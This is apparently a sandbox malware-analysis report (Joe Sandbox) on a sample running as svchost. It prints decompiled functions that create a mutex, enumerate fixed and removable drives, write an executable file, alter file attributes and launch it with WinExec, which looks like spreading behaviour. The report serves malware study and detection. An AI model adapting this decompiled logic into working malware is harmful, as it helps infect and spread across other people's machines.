                                                                          0x004075d0
                                                                          0x004075de
                                                                          0x004075e3
                                                                          0x004075ef
                                                                          0x004075f4
                                                                          0x00407601
                                                                          0x00407603
                                                                          0x00407605
                                                                          0x00407607
                                                                          0x0040760c
                                                                          0x00407617
                                                                          0x0040761f
                                                                          0x00407624
                                                                          0x0040762c
                                                                          0x00407631
                                                                          0x00407632
                                                                          0x00407633
                                                                          0x00407633
                                                                          0x00407633
                                                                          0x0040760c
                                                                          0x00407636
                                                                          0x0040763c
                                                                          0x0040763c
                                                                          0x004075ef
                                                                          0x00407643
                                                                          0x00407646
                                                                          0x00407649
                                                                          0x0040765b

                                                                          APIs
                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                          • String ID:
                                                                          • API String ID: 676290295-0
                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406D40, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 538 406d40-406d77 GetLogicalDriveStringsA 539 406dd5-406de1 538->539 540 406de3-406dfb call 403094 539->540 541 406d79-406d91 GetDriveTypeA 539->541 542 406dd2 541->542 543 406d93-406da1 call 40258c 541->543 542->539 543->542 549 406da3-406db1 call 40258c 543->549 549->542 552 406db3-406dcd call 4031b4 call 403214 549->552 552->542
                                                                          C-Code - Quality: 68%
                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
				char _v155;
				char _v160;
				int _t23;
				signed int _t37;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;

				_t50 = _t51;
				_v160 = 0;
				_t45 = __eax;
				_push(_t50);
				_push(0x406dfc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xffffff64;
				GetLogicalDriveStringsA(0x97,  &_v155); // executed
				_t37 = 0;
				while(_a12245929 != 0) {
					_t48 = _t37 & 0x000000ff;
					_t23 = GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97); // executed
					if(_t23 != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
						E004031B4();
						E00403214(_t45, _v160);
					}
					_t37 = _t37 + 4;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00406E03);
				return E00403094( &_v160);
			}











                                                                          0x00406d41
                                                                          0x00406d4e
                                                                          0x00406d54
                                                                          0x00406d58
                                                                          0x00406d59
                                                                          0x00406d5e
                                                                          0x00406d61
                                                                          0x00406d70
                                                                          0x00406d75
                                                                          0x00406dd5
                                                                          0x00406d7b
                                                                          0x00406d89
                                                                          0x00406d91
                                                                          0x00406dc0
                                                                          0x00406dcd
                                                                          0x00406dcd
                                                                          0x00406dd2
                                                                          0x00406dd2
                                                                          0x00406de5
                                                                          0x00406de8
                                                                          0x00406deb
                                                                          0x00406dfb

                                                                          APIs
                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Drive$LogicalStringsType
                                                                          • String ID:
                                                                          • API String ID: 1630765265-0
                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 559 4012a0-4012ad 560 4012b6-4012bc 559->560 561 4012af-4012b4 559->561 562 4012c2-4012da VirtualAlloc 560->562 561->562 563 4012dc-4012ea call 401154 562->563 564 4012ff-401302 562->564 563->564 567 4012ec-4012fd VirtualFree 563->567 567->564
                                                                          C-Code - Quality: 100%
                                                                          			E004012A0(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401154(0x40a5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                          0x004012a3
                                                                          0x004012ad
                                                                          0x004012bc
                                                                          0x004012af
                                                                          0x004012af
                                                                          0x004012af
                                                                          0x004012c2
                                                                          0x004012cf
                                                                          0x004012d4
                                                                          0x004012d6
                                                                          0x004012da
                                                                          0x004012e3
                                                                          0x004012ea
                                                                          0x004012f6
                                                                          0x004012fd
                                                                          0x00000000
                                                                          0x004012fd
                                                                          0x004012ea
                                                                          0x00401302

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407D9C, Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 52%
                                                                          			E00407D9C(char* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char* _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				void* _t49;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t66;

				_t62 = __esi;
				_t61 = __edi;
				_t48 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t66);
				_push(0x407e75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t66;
				if( *_v8 != 0x5c) {
					E00407BD4(_v8, __ebx, __esi); // executed
				} else {
					E004071D0(_v8, __ebx, __edi, __esi);
				}
				_t63 = E00404AE8(_t48, _t61, _t62);
				if(_t63 > 0) {
					_t49 = 1;
					do {
						E004049D0(_t49, _t49,  &_v12, _t61, _t63);
						if( *_v12 != 0x5c) {
							E004049D0(_t49, _t49,  &_v20, _t61, _t63);
							E00407BD4(_v20, _t49, _t63); // executed
						} else {
							E004049D0(_t49, _t49,  &_v16, _t61, _t63);
							E004071D0(_v16, _t49, _t61, _t63);
						}
						_t49 = _t49 + 1;
						_t63 = _t63 - 1;
					} while (_t63 != 0);
				}
				_push(1);
				_push(_v8);
				_push(E00407E8C);
				E00406F34(0, _t48,  &_v28, _t61, _t63);
				E004032CC();
				WinExec(E0040340C(_v24), _v28); // executed
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00407E7C);
				return E004030B8( &_v28, 6);
			}













                                                                          0x00407d9c
                                                                          0x00407d9c
                                                                          0x00407d9c
                                                                          0x00407da1
                                                                          0x00407da2
                                                                          0x00407da3
                                                                          0x00407da4
                                                                          0x00407da5
                                                                          0x00407da6
                                                                          0x00407da7
                                                                          0x00407da8
                                                                          0x00407da9
                                                                          0x00407daf
                                                                          0x00407db6
                                                                          0x00407db7
                                                                          0x00407dbc
                                                                          0x00407dbf
                                                                          0x00407dc8
                                                                          0x00407dd7
                                                                          0x00407dca
                                                                          0x00407dcd
                                                                          0x00407dcd
                                                                          0x00407de1
                                                                          0x00407de5
                                                                          0x00407de7
                                                                          0x00407dec
                                                                          0x00407df1
                                                                          0x00407dfc
                                                                          0x00407e17
                                                                          0x00407e1f
                                                                          0x00407dfe
                                                                          0x00407e03
                                                                          0x00407e0b
                                                                          0x00407e0b
                                                                          0x00407e24
                                                                          0x00407e25
                                                                          0x00407e25
                                                                          0x00407dec
                                                                          0x00407e28
                                                                          0x00407e2a
                                                                          0x00407e2d
                                                                          0x00407e37
                                                                          0x00407e47
                                                                          0x00407e55
                                                                          0x00407e5c
                                                                          0x00407e5f
                                                                          0x00407e62
                                                                          0x00407e74

                                                                          APIs
                                                                          • WinExec.KERNEL32 ref: 00407E55
                                                                            • Part of subcall function 004071D0: GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                            • Part of subcall function 004071D0: SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                            • Part of subcall function 00407BD4: GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                            • Part of subcall function 00407BD4: SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$ExecModuleName
                                                                          • String ID:
                                                                          • API String ID: 1864538708-0
                                                                          • Opcode ID: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                          • Instruction ID: 40707d73a39ba7ecc7968a88c6b1cf4d961407a3323fd5b51122ef1c80257f0a
                                                                          • Opcode Fuzzy Hash: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                          • Instruction Fuzzy Hash: C5216570E04209AFDB01EBA5CC82AAF77B8EF44304F5044BBB500B72D1D67CAE05979A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405E50, Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 70%
                                                                          			E00405E50(void* __eax, void* __ecx, void* __edx) {
				void* _t8;
				void* _t11;
				void* _t13;
				long _t14;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t33;

				_push(__eax);
				_t8 = E00404B68(__edx, 0x40000400) + 1;
				if(_t8 != 0) {
					_t23 = _t8 - 1;
					_pop(_t11);
					E00405D30(_t11, _t33);
					_t13 = 0;
					_t14 = E0040320C(_t13);
					_t32 = _t13;
					_push(_t32);
					E00404BE0(_t23, _t14, _t32);
					SetEndOfFile(_t23); // executed
					E00404B90(_t23);
					_t21 = E004044A8();
					_push(_t32);
					_t8 = _t21 + 1;
				}
				return _t8;
			}











                                                                          0x00405e51
                                                                          0x00405e5d
                                                                          0x00405e5e
                                                                          0x00405e61
                                                                          0x00405e62
                                                                          0x00405e67
                                                                          0x00405e6c
                                                                          0x00405e6e
                                                                          0x00405e74
                                                                          0x00405e75
                                                                          0x00405e78
                                                                          0x00405e7e
                                                                          0x00405e84
                                                                          0x00405e89
                                                                          0x00405e8e
                                                                          0x00405e8f
                                                                          0x00405e8f
                                                                          0x00405e92

                                                                          APIs
                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          • SetEndOfFile.KERNEL32(?,00000000,?,00407FE8,00000000,00407FFE,?,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000), ref: 00405E7E
                                                                            • Part of subcall function 00404B90: CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleWrite
                                                                          • String ID:
                                                                          • API String ID: 1065093856-0
                                                                          • Opcode ID: 8c09bd4d963a50a7faf13c3890e17a4b6a86585bbbe459f83c5b676390fd9176
                                                                          • Instruction ID: 282573299c96567a49cd7015b4ad24297c06c8278f95cf55d9cf1746db26bc01
                                                                          • Opcode Fuzzy Hash: 8c09bd4d963a50a7faf13c3890e17a4b6a86585bbbe459f83c5b676390fd9176
                                                                          • Instruction Fuzzy Hash: 58E092E1289A611DE202B6662CA7B2E6119CAC021DF61983FB605EB1C3C93DD80600AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404808, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404808(void* __eax, CHAR** __edx) {
				void* _t7;
				long _t9;
				long _t10;
				CHAR** _t14;
				void* _t15;

				_t14 = __edx;
				_t15 = __eax;
				_t10 = E0040320C(__eax);
				_t7 = E00403184(__edx, _t10, E0040340C(_t15));
				if(_t10 > 0) {
					_t9 = CharLowerBuffA( *_t14, _t10); // executed
					return _t9;
				}
				return _t7;
			}








                                                                          0x0040480b
                                                                          0x0040480d
                                                                          0x00404816
                                                                          0x00404825
                                                                          0x0040482c
                                                                          0x00404832
                                                                          0x00000000
                                                                          0x00404832
                                                                          0x0040483a

                                                                          APIs
                                                                          • CharLowerBuffA.USER32(00000000,00000000,?,?,?,004048BE,00000000,00000000,?,0040558D,00000000,00405611,?,00000000,?,00000000), ref: 00404832
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: BuffCharLower
                                                                          • String ID:
                                                                          • API String ID: 2358735015-0
                                                                          • Opcode ID: 77ff168e13d2d29f1b12420b26d373017b2423865bfbd764805228717caed2c8
                                                                          • Instruction ID: c09f9eebdd676df2f73b89bb3c73fd995db2893554e7900a9a0ed4ebbaba9e65
                                                                          • Opcode Fuzzy Hash: 77ff168e13d2d29f1b12420b26d373017b2423865bfbd764805228717caed2c8
                                                                          • Instruction Fuzzy Hash: 74D017A2300124178200BAAF08C595A9ACD4ED82A6314443FB618EB383EE78CD06026C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t11;
				int _t16;

				_t16 = __ecx;
				_t11 = __eax;
				E004064E4(__eax);
				_t6 = E0040340C(__edx);
				_t7 =  *0x40a650; // 0x400000
				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
				if(_t8 > 1) {
					return E00406520(_t11, _t8);
				}
				return _t8;
			}








                                                                          0x00406cab
                                                                          0x00406caf
                                                                          0x00406cb3
                                                                          0x00406cbb
                                                                          0x00406cc1
                                                                          0x00406cc7
                                                                          0x00406ccf
                                                                          0x00000000
                                                                          0x00406cd4
                                                                          0x00406cdc

                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                          • String ID:
                                                                          • API String ID: 2619871307-0
                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404F34(void* __eax, void* __edx) {
				char _v268;
				long _t6;
				void* _t13;
				void* _t14;

				_t13 = __edx;
				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
				return E00403184(_t13, _t6, _t14);
			}







                                                                          0x00404f3c
                                                                          0x00404f52
                                                                          0x00404f6a

                                                                          APIs
                                                                          • GetShortPathNameA.KERNEL32(00000000,?,00000104), ref: 00404F52
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: NamePathShort
                                                                          • String ID:
                                                                          • API String ID: 1295925010-0
                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
				CHAR* _t1;
				void* _t2;
				long _t6;
				long _t9;

				_t9 = __edx;
				_t1 = __eax;
				_push(0);
				_t6 = __edx >> 0x00000010 & 0x00001fff;
				if(_t6 == 0) {
					_t6 = 0x80;
				}
				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
				return _t2;
			}







                                                                          0x00404b68
                                                                          0x00404b68
                                                                          0x00404b6a
                                                                          0x00404b70
                                                                          0x00404b75
                                                                          0x00404b77
                                                                          0x00404b77
                                                                          0x00404b88
                                                                          0x00404b8d

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                          0x0040401b
                                                                          0x00404023
                                                                          0x0040402e
                                                                          0x00404034

                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateMutex
                                                                          • String ID:
                                                                          • API String ID: 1964310414-0
                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404B9C() {
				void* _t3;
				long _t5;
				void* _t6;
				void* _t10;

				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
				_t6 = _t5 + 1;
				_t10 = _t6;
				if(_t10 != 0) {
					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
				}
				return _t6;
			}







                                                                          0x00404ba2
                                                                          0x00404ba7
                                                                          0x00404ba7
                                                                          0x00404ba8
                                                                          0x00000000
                                                                          0x00404bad
                                                                          0x00404bb0

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                          • Opcode Fuzzy Hash: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                          Uniqueness

